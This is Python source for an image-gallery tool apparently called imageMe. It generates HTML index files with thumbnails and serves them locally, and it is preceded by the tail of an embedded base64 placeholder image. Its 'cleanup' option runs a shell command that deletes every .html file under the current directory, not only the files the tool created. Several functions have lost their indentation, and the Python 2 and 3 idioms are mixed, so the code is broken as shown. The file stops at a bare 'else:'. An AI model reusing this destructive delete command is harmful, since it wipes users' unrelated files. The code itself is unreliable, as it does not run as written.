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wcdxgkEehoA8y8BfHa717xLa6Pr2n2sIvJBHBPa7lCufuqysTnJ4zngkcV7lXhvgH4D3eg+JbbWNd1G1mFnIJYILTcwZx90szAYwecAdcc17lQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFGe1FGM0AfII+CfxCOP+Kf/wDJyD/4uvr6kxS0AFcV8U/DereLfBUukaO1us8k8bus7lQ6L82AQDzkL1x0rtaTAoA+SIvgb4/kmEb6PFEuceY95EVHvwxP6V738NvhlY+AbKSRpRd6tcACa524Cr12ID0Hqep/AAd7RQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAZr5B/4Ul8Q/8AoX//ACdt/wD45X16RmlxQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABUN1JNFZzyW8JnnSNmjiDBfMYDhcngZPGTU1FAHyGvwR+ILMAdBC5PLG8g49+Hr66jRI41jjUKiAKqgYAA6ClxS0AFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABXgHi74A3l74lW80PUhJZ3lxuuhdNmWDccs4P8Y69cHOOvJHv9GOc0AQWdpBYWcNpaRLFbwoI441GAqgYAFT0UUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF
ABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF
ABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF
ABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFAH/9k='
class BackgroundIndexFileGenerator:
    """Generate index files for a directory tree on a background thread."""

    def __init__(self, dir_path):
        # Root directory whose index files will be (re)generated.
        self.dir_path = dir_path
        # Daemon thread: the interpreter may exit without waiting for the
        # indexing pass to finish.
        self.thread = threading.Thread(target=self._process)
        self.thread.daemon = True

    def _process(self):
        # Delegate the actual crawl/indexing to the module-level helper.
        _create_index_files(self.dir_path)

    def run(self):
        """Kick off index generation in the background; returns immediately."""
        self.thread.start()
def _clean_up(paths):
"""
Clean up after ourselves, removing created files.
@param {[String]} A list of file paths specifying the files we've created
during run. Will all be deleted.
@return {None}
"""
print('Cleaning up')
# Iterate over the given paths, unlinking them
for path in paths:
print('Removing %s' % path)
os.unlink(path)
def _create_index_file(
    root_dir, location, image_files, dirs, force_no_processing=False):
    """
    Create an index file in the given location, supplying known lists of
    present image files and subdirectories.
    @param {String} root_dir - The root directory of the entire crawl. Used to
        ascertain whether the given location is the top level.
    @param {String} location - The current directory of the crawl. The index
        file will be created here.
    @param {[String]} image_files - A list of image file names in the location.
        These will be displayed in the index file's gallery.
    @param {[String]} dirs - The subdirectories of the location directory.
        These will be displayed as links further down the file structure.
    @param {Boolean=False} force_no_processing - If True, do not attempt to
        actually process thumbnails, PIL images or anything. Simply index
        <img> tags with original file src attributes.
    @return {String} The full path (location plus filename) of the newly
        created index file. Intended for usage cleaning up created files.
    """
    # Put together HTML as a list of the lines we'll want to include
    # Issue #2 exists to do this better than HTML in-code
    header_text = \
        'imageMe: ' + location + ' [' + str(len(image_files)) + ' image(s)]'
    html = [
        '<!DOCTYPE html>',
        '<html>',
        ' <head>',
        # The two commas below were previously missing, so the meta, title
        # and style-open literals were silently concatenated into a single
        # list element (one long HTML line).
        ' <meta http-equiv="Content-Type" content="text/html;charset=UTF-8">',
        ' <title>imageMe</title>',
        ' <style>',
        ' html, body {margin: 0;padding: 0;}',
        ' .header {text-align: right;}',
        ' .content {',
        ' padding: 3em;',
        ' padding-left: 4em;',
        ' padding-right: 4em;',
        ' }',
        ' .image {max-width: 100%; border-radius: 0.3em;}',
        ' td {width: ' + str(100.0 / IMAGES_PER_ROW) + '%;}',
        ' </style>',
        ' </head>',
        ' <body>',
        ' <div class="content">',
        ' <h2 class="header">' + header_text + '</h2>'
    ]
    # Populate the present subdirectories - this includes '..' unless we're at
    # the top level
    directories = []
    if root_dir != location:
        directories = ['..']
    directories += dirs
    if len(directories) > 0:
        html.append('<hr>')
    # For each subdirectory, include a link to its index file
    for directory in directories:
        link = directory + '/' + INDEX_FILE_NAME
        html += [
            ' <h3 class="header">',
            ' <a href="' + link + '">' + directory + '</a>',
            ' </h3>'
        ]
    # Populate the image gallery table
    # Counter to cycle down through table rows
    table_row_count = 1
    html += ['<hr>', '<table>']
    # For each image file, potentially create a new <tr> and create a new <td>
    for image_file in image_files:
        if table_row_count == 1:
            html.append('<tr>')
        img_src = _get_thumbnail_src_from_file(
            location, image_file, force_no_processing
        )
        link_target = _get_image_link_target_from_file(
            location, image_file, force_no_processing
        )
        html += [
            ' <td>',
            ' <a href="' + link_target + '">',
            ' <img class="image" src="' + img_src + '">',
            ' </a>',
            ' </td>'
        ]
        # Wrap to a new row once we've emitted IMAGES_PER_ROW cells
        if table_row_count == IMAGES_PER_ROW:
            table_row_count = 0
            html.append('</tr>')
        table_row_count += 1
    html += ['</tr>', '</table>']
    html += [
        ' </div>',
        ' </body>',
        '</html>'
    ]
    # Actually create the file, now we've put together the HTML content.
    # A context manager guarantees the handle is closed even if write fails.
    index_file_path = _get_index_file_path(location)
    print('Creating index file %s' % index_file_path)
    with open(index_file_path, 'w') as index_file:
        index_file.write('\n'.join(html))
    # Return the path for cleaning up later
    return index_file_path
def _create_index_files(root_dir, force_no_processing=False):
    """
    Crawl the root directory downwards, generating an index HTML file in each
    directory on the way down.
    @param {String} root_dir - The top level directory to crawl down from. In
        normal usage, this will be '.'.
    @param {Boolean=False} force_no_processing - If True, do not attempt to
        actually process thumbnails, PIL images or anything. Simply index
        <img> tags with original file src attributes.
    @return {[String]} Full file paths of all created files.
    """
    # Initialise list of created file paths to build up as we make them
    created_files = []
    # Walk the root dir downwards, creating index files as we go
    for here, dirs, files in os.walk(root_dir):
        print('Processing %s' % here)
        # Sort the subdirectories IN PLACE: os.walk consults this very list
        # to decide which directories to descend into next, so rebinding the
        # name (dirs = sorted(dirs)) sorted only the links written into this
        # index file while leaving the crawl order arbitrary.
        dirs.sort()
        # Get image files - all files in the directory matching
        # IMAGE_FILE_REGEX, sorted by name
        image_files = sorted(f for f in files if re.match(IMAGE_FILE_REGEX, f))
        # Create this directory's index file and add its name to the created
        # files list
        created_files.append(
            _create_index_file(
                root_dir, here, image_files, dirs, force_no_processing
            )
        )
    # Return the list of created files
    return created_files
def _get_image_from_file(dir_path, image_file):
    """
    Load the given file as a PIL.Image.
    @param {String} dir_path - The directory containing the image file
    @param {String} image_file - The filename of the image file within dir_path
    @return {PIL.Image} The loaded image, or None when PIL is unavailable or
        the file cannot be read.
    """
    # Without PIL there is nothing we can do - bail out immediately
    if not PIL_ENABLED:
        return None
    full_path = os.path.join(dir_path, image_file)
    try:
        return Image.open(full_path)
    except IOError as exptn:
        print('Error loading image file %s: %s' % (full_path, exptn))
        return None
def _get_image_link_target_from_file(dir_path, image_file, force_no_processing=False):
    """
    Get the value to be used as the href for links from thumbnail images. For
    most image formats this will simply be the image file name itself. However,
    some image formats (tif) are not natively displayable by many browsers and
    therefore we must link to image data in another format.
    @param {String} dir_path - The directory containing the image file
    @param {String} image_file - The filename of the image file within dir_path
    @param {Boolean=False} force_no_processing - If True, do not attempt to
        actually process a thumbnail, PIL image or anything. Simply return the
        image filename as src.
    @return {String} The href to use.
    """
    # If we've specified to force no processing, just return the image filename
    if force_no_processing:
        return image_file
    # First try to get an image
    img = _get_image_from_file(dir_path, image_file)
    # BUG FIX: _get_image_from_file returns None when PIL is absent or the
    # file is unreadable; the original dereferenced img.format and crashed
    # with AttributeError. Fall back to linking the file directly.
    if img is None:
        return image_file
    # If format is directly displayable in-browser, just return the filename
    # Else, we need to return a full-sized chunk of displayable image data
    if img.format.lower() in ['tif', 'tiff']:
        return _get_image_src_from_file(
            dir_path, image_file, force_no_processing
        )
    return image_file
def _get_image_src_from_file(dir_path, image_file, force_no_processing=False):
    """
    Full-size counterpart of _get_thumbnail_src_from_file: base-64 encoded
    data (or a file path fallback) for direct use in HTML <img> src
    attributes. Needed for formats (tif/tiff) which browsers cannot render
    natively even at full size.
    @param {String} dir_path - The directory containing the image file
    @param {String} image_file - The filename of the image file within dir_path
    @param {Boolean=False} force_no_processing - If True, skip all image
        processing and return the raw filename (or a placeholder for tiffs).
    @return {String} The base-64 encoded image data string, or path to the
        file itself if not supported.
    """
    if force_no_processing:
        # Tiffs cannot be shown unprocessed - substitute the placeholder
        if image_file.endswith(('tif', 'tiff')):
            return UNSUPPORTED_IMAGE_TYPE_DATA
        return image_file
    # Load the image and delegate the base-64 conversion
    loaded = _get_image_from_file(dir_path, image_file)
    return _get_src_from_image(loaded, image_file)
def _get_index_file_path(location):
    """
    Build the path of the index file for the given directory: the location
    joined with the constant INDEX_FILE_NAME.
    @param {String} location - Directory in which a new index file will live.
    @return {String} File path for usage with a new index file.
    """
    return os.path.join(location, INDEX_FILE_NAME)
def _get_server_port():
"""
Get the port specified for the server to run on. If given as the first
command line argument, we'll use that. Else we'll default to 8000.
@return {Integer} The port to run the server on. Default 8000, overridden
by first command line argument.
"""
return int(sys.argv[1]) if len(sys.argv) >= 2 else 8000
def _get_src_from_image(img, fallback_image_file):
"""
Get base-64 encoded data as a string for the given image. Fallback to return
fallback_image_file if cannot get the image data or img is None.
@param {Image} img - The PIL Image to get src data for
@param {String} fallback_image_file - The filename of the image file,
to be used when image data capture fails
@return {String} The base-64 encoded image data string, or path to the file
itself if not supported.
"""
# If the image is None, then we can't process, so we should return the
# path to the file itself
if img is None:
return fallback_image_file
# Target format should be the same as the original image format, unless it's
# a TIF/TIFF, which can't be displayed by most browsers; we convert these
# to jpeg
target_format = img.format
if target_format.lower() in ['tif', 'tiff']:
target_format = 'JPEG'
# If we have an actual Image, great - put together the base64 image string
try:
bytesio = io.BytesIO()
img.save(bytesio, target_format)
byte_value = bytesio.getvalue()
b64 = base64.b64encode(byte_value)
return 'data:image/%s;base64,%s' % (target_format.lower(), b64)
except IOError as exptn:
print('IOError while saving image bytes: %s' % exptn)
return fallback_image_file
def _get_thumbnail_image_from_file(dir_path, image_file):
    """
    Produce a PIL.Image thumbnail scaled down to THUMBNAIL_WIDTH wide.
    @param {String} dir_path - The directory containing the image file
    @param {String} image_file - The filename of the image file within dir_path
    @return {PIL.Image} The scaled image, or None when the image cannot be
        loaded, is a gif, or thumbnailing fails. See _get_image_from_file
        for details on load failures.
    """
    source = _get_image_from_file(dir_path, image_file)
    # No image means no thumbnail
    if source is None:
        return None
    # Gifs are deliberately not thumbnailed - presumably to keep their
    # animation intact at serve time (TODO confirm)
    if source.format.lower() == 'gif':
        return None
    # Scale height by the same ratio that brings the width to THUMBNAIL_WIDTH
    width, height = source.size
    ratio = THUMBNAIL_WIDTH / float(width)
    scaled_height = int(ratio * height)
    try:
        source.thumbnail((THUMBNAIL_WIDTH, scaled_height), resample=RESAMPLE)
    except IOError as exptn:
        print('WARNING: IOError when thumbnailing %s/%s: %s' % (
            dir_path, image_file, exptn
        ))
        return None
    return source
def _get_thumbnail_src_from_file(dir_path, image_file, force_no_processing=False):
    """
    Get an <img> src value for the given image file's thumbnail: base-64
    data when scaling is possible, otherwise a path to the original file.
    @param {String} dir_path - The directory containing the image file
    @param {String} image_file - The filename of the image file within dir_path
    @param {Boolean=False} force_no_processing - If True, skip all thumbnail
        and PIL processing and return the raw filename (or a placeholder
        for tiffs, which browsers cannot render).
    @return {String} The base-64 encoded image data string, or path to the
        file itself if not supported.
    """
    if force_no_processing:
        if image_file.endswith(('tif', 'tiff')):
            return UNSUPPORTED_IMAGE_TYPE_DATA
        return image_file
    # Attempt the thumbnail; _get_src_from_image falls back to the filename
    # when the thumbnail could not be produced
    thumb = _get_thumbnail_image_from_file(dir_path, image_file)
    return _get_src_from_image(thumb, image_file)
def _run_server():
    """
    Run the image server. This is blocking. Handles user KeyboardInterrupt
    and other exceptions appropriately and returns control once the server
    is stopped.
    @return {None}
    """
    port = _get_server_port()
    # Make re-runs of the script less painful: without allow_reuse_address a
    # subsequent run can block waiting for the OS to free the old socket
    SocketServer.TCPServer.allow_reuse_address = True
    httpd = SocketServer.TCPServer(
        ('', port),
        SimpleHTTPServer.SimpleHTTPRequestHandler
    )
    # Announce the URL up front (cheeky / optimistic, before serving starts)
    print('Your images are at http://127.0.0.1:%d/%s' % (
        port,
        INDEX_FILE_NAME
    ))
    try:
        # This call blocks until the server is killed
        httpd.serve_forever()
    except KeyboardInterrupt:
        # Expected shutdown path - imageMe is intended for ad-hoc running
        # from the command line
        print('User interrupted, stopping')
    except Exception as exptn:
        # Everything else: shutdowns via other signals, and faults actually
        # starting the server in the first place
        print(exptn)
        print('Unhandled exception in server, stopping')
def serve_dir(dir_path):
    """
    Generate indexes and run server from the given directory downwards.
    Dispatches on sys.argv[1]: 'generate' builds index files, 'cleanup'
    removes them, anything else (e.g. a port number) starts the server.
    @param {String} dir_path - The directory path (absolute, or relative to CWD)
    @return {None}
    """
    if len(sys.argv) < 2:
        # CONSISTENCY FIX: use the print() call form like the rest of this
        # file (the old Python 2 `print "..."` statement is a syntax error
        # under Python 3).
        print("python imageme.py [port|generate|cleanup]")
        sys.exit(0)
    if sys.argv[1] == "generate":
        # Create index files, and store the list of their paths for cleanup later
        # This time, force no processing - this gives us a fast first-pass in terms
        # of page generation, but potentially slow serving for large image files
        print('Performing first pass index file generation')
        created_files = _create_index_files(dir_path, True)
        if (PIL_ENABLED):
            # If PIL is enabled, we'd like to process the HTML indexes to include
            # generated thumbnails - this slows down generation so we don't do it
            # first time around, but now we're serving it's good to do in the
            # background
            print('Performing PIL-enchanced optimised index file generation in background')
            background_indexer = BackgroundIndexFileGenerator(dir_path)
            background_indexer.run()
    elif sys.argv[1] == "cleanup":
        # Clean up the index files created earlier so we don't make a mess of
        # the image directories
        #_clean_up(created_files)
        # WARNING: this deletes EVERY .html file under the current directory,
        # not only the generated index files - confirm before relying on it.
        os.system("find . -name '*.html'|xargs rm -f")
    else:
